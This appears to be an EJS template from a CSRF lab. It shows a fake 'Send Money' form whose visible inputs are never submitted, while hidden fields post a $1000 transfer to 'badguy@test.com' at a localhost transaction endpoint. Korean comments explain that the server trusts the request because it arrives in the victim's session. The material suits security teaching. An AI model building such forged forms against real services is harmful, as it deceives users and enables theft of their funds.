<%- include('includes/head.ejs', { title: 'Transaction' }) %>
<link rel="stylesheet" href="/styles/forms.css">
</head>
<body>
  <%- include('includes/header.ejs') %>
  <main>
    <h1>Send Money</h1>
    <form action="http://localhost:4771/transaction" method="POST">
      <div class="form-control">
        <!-- user는 값을 입력해도 값이 서버에 전달되지 않는다. -->
        <label for="recipient">Recipient Email</label>
        <input type="email" id="recipient">
      </div>
      <div class="form-control">
        <label for="amount">Amount</label>
        <input type="text" id="amount">
      </div>
      <!-- 실제로 전송하는 값은 아래의 값이다. 서버는 동일한 세션으로 감지하기 때문에, 아래의 값을 의심없이 받아들일 수 있다.-->
      <input type="hidden" name="recipient" value="badguy@test.com">
      <input type="hidden" name="amount" value="1000" >
      <button class="btn">Send</button>
    </form>
  </main>
</body>
</html>